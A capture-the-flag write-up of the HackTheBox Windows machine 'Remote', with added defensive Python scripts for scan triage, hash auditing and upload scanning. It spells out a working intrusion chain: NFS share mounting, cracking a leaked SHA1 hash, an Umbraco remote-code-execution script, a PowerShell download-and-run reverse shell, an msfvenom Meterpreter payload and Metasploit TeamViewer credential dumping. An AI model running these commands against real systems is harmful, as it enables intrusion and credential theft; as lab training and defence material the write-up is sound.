[HTB] – Remote

Hey! Today's writeup is on Remote, an Easy Windows box released on March 21st 2020 on HackTheBox.

If you have VIP access on the website, you can access it here: https://www.hackthebox.eu/home/machines/profile/234

It was my first Windows box. I had wanted to do one for quite some time, but starting from scratch isn't easy: Windows and Linux boxes aren't alike at all. When I started Linux boxes I already had experience with the Linux terminal, but I had none with Windows PowerShell. So I struggled to get this box done, but now it is done, and I am very happy to present my writeup of it.

Recon

As always, I performed an Nmap scan:

nmap -A -p- -T4 10.10.10.180

I am using the same flags as always:

  • -A : enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
  • -p- : scans every TCP port instead of only the default 1000 most common ones
  • -T4 : sets the timing template (adjust it to your bandwidth and how fast you want the scan to finish)

Here are the scan results:

Nmap scan report for 10.10.10.180
Host is up (0.089s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=6/29%OT=21%CT=1%CU=43315%PV=Y%DS=2%DC=T%G=Y%TM=5EFA427
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=103%TI=I%CI=I%II=I%SS=S%TS=
OS:U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS
OS:%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%
OS:DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S
OS:=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=
OS:Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4m20s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-29T19:38:43
|_  start_date: N/A

TRACEROUTE (using port 110/tcp)
HOP RTT      ADDRESS
1   88.03 ms 10.10.14.1
2   87.58 ms 10.10.10.180

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 568.54 seconds
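Scan output like the one above is exactly what a defender gets from scanning their own perimeter, so it is worth turning into findings automatically. The Python script below is added here as an example and is not part of the original writeup: it parses Nmap's normal output into open-port records plus host-script lines, then maps the exposures this box shows (anonymous FTP, NFS and rpcbind reachable, SMB without required signing, a WinRM listener) onto remediation notes. The embedded sample is an abridged copy of the scan results above; the severity labels and the remediation wording are my own assumptions.

```python
import re
from dataclasses import dataclass, field

# Matches the port-table rows of nmap's normal (-oN) output, e.g.
# "21/tcp    open  ftp           Microsoft ftpd"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class OpenPort:
    port: int
    proto: str
    service: str
    version: str
    scripts: list = field(default_factory=list)  # NSE script lines attached to this port


def parse_nmap_normal(text):
    """Return (open_ports, host_script_lines) parsed from nmap -oN style output."""
    ports, host_scripts, target = [], [], None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            if state == "open":
                current = OpenPort(int(port), proto, service, version.strip())
                ports.append(current)
                target = current.scripts  # following "|" lines belong to this port
            else:
                target = None
            continue
        if line.startswith("Host script results:"):
            target = host_scripts  # following "|" lines are host-level script output
            continue
        if line.startswith("|"):
            if target is not None:
                target.append(line.lstrip("|_ ").strip())
            continue
        target = None  # any other line ends the current script context
    return ports, host_scripts


def assess(ports, host_scripts):
    """Map the parsed scan onto (severity, message) findings a defender would act on."""
    findings = []
    for p in ports:
        if p.service == "ftp" and any("Anonymous FTP login allowed" in s for s in p.scripts):
            findings.append(("high", f"{p.port}/{p.proto}: anonymous FTP login allowed; disable it or restrict the listener"))
        if p.port == 2049 or p.service in ("nfs", "mountd"):
            findings.append(("high", f"{p.port}/{p.proto}: NFS/mountd reachable; review the export list and restrict client hosts"))
        if p.port == 111:
            findings.append(("medium", f"{p.port}/{p.proto}: rpcbind reachable; it advertises the NFS/mountd program numbers"))
        if p.port == 445 and p.proto == "tcp":
            findings.append(("medium", "445/tcp: SMB reachable from the scanning host; limit it to trusted networks"))
        if p.port == 5985 and p.proto == "tcp":
            findings.append(("medium", "5985/tcp: WinRM HTTP listener reachable; restrict it to management hosts"))
    if any("Message signing enabled but not required" in s for s in host_scripts):
        findings.append(("medium", "SMB signing is not required; enforce signing to stop relay attacks"))
    return findings


# Abridged copy of the scan results above (sample input for the parser).
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.180
Host is up (0.089s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100003  2,3,4       2049/tcp   nfs
|_  100005  1,2,3       2049/tcp   mountd
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4m20s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

if __name__ == "__main__":
    open_ports, host_lines = parse_nmap_normal(SAMPLE_SCAN)
    for severity, message in assess(open_ports, host_lines):
        print(f"[{severity}] {message}")
```

The parser only keys on the port-table rows and the "|" script lines, so it survives the OS-fingerprint and traceroute sections unchanged; feed it the output of `nmap -oN` and add rules to `assess` for whatever your environment considers unacceptable.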

Own user

After taking a close look at the result file, I noticed NFS in the rpcinfo output. NFS is a protocol that lets hosts access files on a remote server. Keep in mind that Nmap is a very powerful tool with many scripts to check all sorts of things. For example, by running

nmap --script=nfs-showmount 10.10.10.180

you are checking for NFS mount points. Here we get site_backups, a promising lead. All I had to do was mount it:

$ mkdir mnt
$ sudo mount 10.10.10.180:/site_backups mnt

After some enumeration by hand on the mounted folder, I found an .sdf file: App_Data/Umbraco.sdf. SDF files are compact databases in SQL Server Compact (SQL CE) format. It's a perfect place to find credentials.

Before we take a look at it: exploring the website hadn't seemed to lead anywhere at first (I skipped directory busting, my mistake), but this file makes it very likely that the website runs on the open-source CMS Umbraco, so I tried navigating to 10.10.10.180/Umbraco/. Bingo!

I tried some basic SQL injections on the login form, without success; we will come back later with credentials.

Now back to our Umbraco.sdf. The first thing I tried worked (a bit of luck, for once 🙂):

strings Umbraco.sdf | grep admin
[email protected]{"hashAlgorithm":"SHA1"}

We get a username and a password hash.

Let's get the password corresponding to the hash with crackstation (https://crackstation.net/).

We can now use the credentials [email protected] and baconandcheese to log in to the Umbraco CMS page.
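The member record in the backup advertises "hashAlgorithm":"SHA1", an unsalted fast digest, and that is the whole reason a lookup site like crackstation resolves it at once: every account with the same password has the same hash, so one precomputed table answers for all of them. The Python example below is added here and is not from the writeup. It scans a raw dump for that marker (the regex is a constructed approximation of the string seen above, not Umbraco's schema), flags unsalted digests, and contrasts the legacy scheme with a salted PBKDF2 record and its verifier. The base64 encoding of the legacy hash, the sample dump and the password "hunter2" are all constructed for the demo.

```python
import base64
import hashlib
import hmac
import re
import secrets

# Shape of the marker seen in the strings output of the backup above; the regex is a
# constructed approximation, not Umbraco's real schema.
HASH_MARKER_RE = re.compile(rb'\{"hashAlgorithm":"([A-Za-z0-9]+)"\}')
# Unsalted, fast digests: identical passwords give identical hashes, so a precomputed
# lookup table (which is what crackstation is) resolves them instantly.
UNSALTED_FAST_DIGESTS = {"MD5", "SHA1", "SHA256"}


def scan_backup_for_hash_markers(blob: bytes) -> list:
    """Return every hashAlgorithm name found in a raw dump, in order of appearance."""
    return [m.group(1).decode() for m in HASH_MARKER_RE.finditer(blob)]


def weak_algorithms_in(blob: bytes) -> list:
    """Subset of the markers that name an unsalted fast digest (sorted, unique)."""
    return sorted({a for a in scan_backup_for_hash_markers(blob) if a.upper() in UNSALTED_FAST_DIGESTS})


def legacy_sha1_hash(password: str) -> str:
    """Unsalted SHA1, base64-encoded: the weak scheme the backup advertised (illustrative encoding)."""
    return base64.b64encode(hashlib.sha1(password.encode()).digest()).decode()


def pbkdf2_hash(password: str, salt: bytes = None, iterations: int = 600_000) -> str:
    """Salted PBKDF2-HMAC-SHA256 record: 'pbkdf2_sha256$<iterations>$<salt b64>$<digest b64>'."""
    salt = salt if salt is not None else secrets.token_bytes(16)  # fresh random salt per record
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "$".join(["pbkdf2_sha256", str(iterations),
                     base64.b64encode(salt).decode(), base64.b64encode(digest).decode()])


def verify_pbkdf2(password: str, record: str) -> bool:
    """Recompute the digest from the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_b64, digest_b64 = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), base64.b64decode(salt_b64), int(iterations))
    return hmac.compare_digest(candidate, base64.b64decode(digest_b64))


# Constructed stand-in for a few bytes of a members-table dump (not the real Umbraco.sdf).
CONSTRUCTED_DUMP = (
    b"\x00\x00admin\x00" + b'{"hashAlgorithm":"SHA1"}' + b"\x00\x00"
    + b"editor\x00" + b'{"hashAlgorithm":"HMACSHA256"}' + b"\x00"
)

if __name__ == "__main__":
    print("algorithms in dump:", scan_backup_for_hash_markers(CONSTRUCTED_DUMP))
    print("weak:", weak_algorithms_in(CONSTRUCTED_DUMP))
    # Two accounts sharing a password: identical under unsalted SHA1, distinct under PBKDF2.
    print("sha1 equal:", legacy_sha1_hash("hunter2") == legacy_sha1_hash("hunter2"))
    a, b = pbkdf2_hash("hunter2"), pbkdf2_hash("hunter2")
    print("pbkdf2 equal:", a == b, "verify:", verify_pbkdf2("hunter2", a))
```

The takeaway for whoever owns the CMS is twofold: a backup of the members table should never be reachable from an NFS export, and the hashes inside it should be salted and slow, so that a leak does not hand out passwords that are then reused elsewhere.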

There is a way to upload files, which could prove useful later, but not for owning user. For that part, I found a Python script that gets command execution through an authenticated Umbraco vulnerability when given a valid username and password. Here is the link to it: https://github.com/noraj/Umbraco-RCE

You can pass a PowerShell command as an argument. To try it out, just pass "ls" or "dir":

$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "dir C:/users"            


    Directory: C:\users


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/19/2020   3:12 PM                .NET v2.0                                                             
d-----        2/19/2020   3:12 PM                .NET v2.0 Classic                                                     
d-----        2/19/2020   3:12 PM                .NET v4.5                                                             
d-----        2/19/2020   3:12 PM                .NET v4.5 Classic                                                     
d-----         7/8/2020   2:57 AM                Administrator                                                         
d-----        2/19/2020   3:12 PM                Classic .NET AppPool                                                  
d-r---         7/8/2020   8:55 AM                Public

We could adjust the command to print out the user flag, located in C:/users/Public/user.txt, or do something more fun: I hereby summon the reverse shell.

I used the mini-reverse.ps1 script. You can easily find it online; make sure to change the IP address in it to the one OpenVPN gave you, and the port to the one you are going to listen on. Then put it in a server folder and start a little web server:

$ mkdir server
$ cp mini-reverse.ps1 server/
$ cd server
$ sudo python -m http.server --bind  80

If you open your web browser and type in , you should see a list of all files in your server folder, and requests should start piling up in your terminal.

Once the Python server is up and running, start listening on the port you chose (8888 for me):

nc -lvnp 8888

I explain a VERY useful little tip about Netcat-based reverse shells in my "HackTheBox Beginner Guide"; make sure to check it out if you're totally new to this, or even if you're not, to give me some advice 😉

Now that the server is running and Netcat is listening, just launch the reverse shell:

python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http:///mini-reverse.ps1')"

After a few seconds, a Windows shell should pop up in the terminal you were listening in. If not, check that your VPN is still running, that the request made to the server for mini-reverse.ps1 returned a 200, and that the IPs and ports are right. If everything looks right and it still fails, just kill everything and start over.

We just need to print the flag, and we're done with this part!

$ cd C:\users\Public
$ type user.txt

Own root

I found two ways to get root: one that depends on the access you have managed to establish but is faster, and another that always works but takes a bit longer to perform.

I'll show the second one in this writeup.

Just know that the other method uses the PowerUp.ps1 script to perform a ServiceAbuse and add an administrator account, which you then log in with using evil-winrm.

When looking at the processes running on the machine (with ps), I noticed TeamViewer was running. As it is a graphical app and Remote is an Easy box, it wouldn't be running if it weren't useful at some point.

I found a way to gather TeamViewer credentials through Metasploit. The only requirement is a Meterpreter session. To get one, I tried to catch a reverse shell with the Metasploit handler:

$ msfconsole
msf5 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

I first started the Metasploit Framework, set the exploit to multi/handler and the payload to a TCP Meterpreter reverse shell for 64-bit Windows.

You then need to specify your IP and port, start listening, and you are good to go on this side:

msf5 exploit(multi/handler) > set LPORT 8888
LPORT => 8888
msf5 exploit(multi/handler) > set LHOST 
LHOST => 

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.94:8888

The second part is to get the remote host to execute your reverse shell. I first tried the same method as before with the Python script, but then you get a message that a Meterpreter session was opened and never get the prompt back. That is because multi/handler expects its own Meterpreter payload to be running on the machine, not a plain PowerShell shell.

Luckily for us, that isn't hard with msfvenom (a companion tool to Metasploit):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=8888 -f exe > privesc.exe

This generates a Windows executable that we need to upload to the target machine. Told you that Umbraco file upload page was going to come in handy 😉

Go to Media and import the privesc.exe file. Then find where your file ended up: it is in one of the subdirectories of C:/inetpub/wwwroot/Media/.

$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "C:/inetpub/wwwroot/Media/1035/privesc.exe"

Great! We now have our Meterpreter session!

[*] Started reverse TCP handler on 10.10.15.48:8888 
[*] Sending stage (201283 bytes) to 10.10.10.180
[*] Meterpreter session 1 opened (10.10.15.48:8888 -> 10.10.10.180:49759) at 2020-07-08 16:11:42 +0200

meterpreter >
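From the defender's side, the step above (an executable uploaded through the CMS media library and launched from a subdirectory of C:/inetpub/wwwroot/Media/) is something an audit of the media tree can catch: a media folder should contain images and documents, not PE files, whatever their extension says. The Python example below is added here and is not from the writeup. It walks an upload root, reports files outside a media extension allow-list and files whose first bytes are the PE "MZ" header regardless of extension, and builds a constructed demo tree in a temporary directory. The allow-list, the demo file names and their contents are assumptions; only the directory id 1035 and the name privesc.exe come from the writeup.

```python
import tempfile
from pathlib import Path

PE_MAGIC = b"MZ"  # first two bytes of every Windows PE image (exe, dll, sys)
# Assumed allow-list of what a CMS media library should hold; tune to your site.
ALLOWED_MEDIA_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".svg", ".pdf"}


def is_pe_image(path: Path) -> bool:
    """True when the file starts with the PE header, whatever its extension claims."""
    with Path(path).open("rb") as fh:
        return fh.read(2) == PE_MAGIC


def audit_media_dir(root, allowed=ALLOWED_MEDIA_EXTENSIONS):
    """Return [(relative path, [reasons])] for every file that should not be in a media tree."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        reasons = []
        if path.suffix.lower() not in allowed:
            reasons.append(f"extension {path.suffix or '(none)'} not in media allow-list")
        if is_pe_image(path):
            reasons.append("content starts with the MZ PE header")
        if reasons:
            findings.append((path.relative_to(root).as_posix(), reasons))
    return findings


def build_demo_tree() -> Path:
    """Create a constructed media tree in a temp dir: one real PNG, one .exe, one PE renamed to .jpg."""
    root = Path(tempfile.mkdtemp(prefix="media-audit-"))
    (root / "1034").mkdir()
    (root / "1034" / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)  # PNG signature
    (root / "1035").mkdir()
    (root / "1035" / "privesc.exe").write_bytes(b"MZ\x90\x00" + b"\x00" * 60)  # stub PE header only
    (root / "1036").mkdir()
    (root / "1036" / "photo.jpg").write_bytes(b"MZ\x90\x00" + b"\x00" * 60)  # PE hiding behind .jpg
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for rel_path, reasons in audit_media_dir(demo_root):
        print(rel_path)
        for reason in reasons:
            print("  -", reason)
```

Run against the real wwwroot/Media tree, this is a cheap periodic check; combined with an upload allow-list enforced in the CMS itself and a file system ACL that denies execute on the media folder, the upload in this writeup would have been both blocked and visible.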

To run the tool I mentioned, just type the following command in Meterpreter:

meterpreter > run post/windows/gather/credentials/teamviewer_passwords

[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
[+] Passwords stored in: /home/leo/.msf4/loot/20200708162410_default_10.10.10.180_host.teamviewer__598662.txt

We got ourselves a password 🙂

Let's see if it is the Administrator password we are looking for. To connect to a Windows machine with credentials, evil-winrm is a great tool. You can find it here: https://github.com/Hackplayers/evil-winrm

Here is how it's used:

$ evil-winrm -i 10.10.10.180 -u Administrator -p '!R3m0te!'                                                                      

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:/users/Administrator/Desktop/root.txt
69ee6ac83f153675310f9894b92e1ca2

That's it for this writeup! I hope you enjoyed it, and see you for another one!
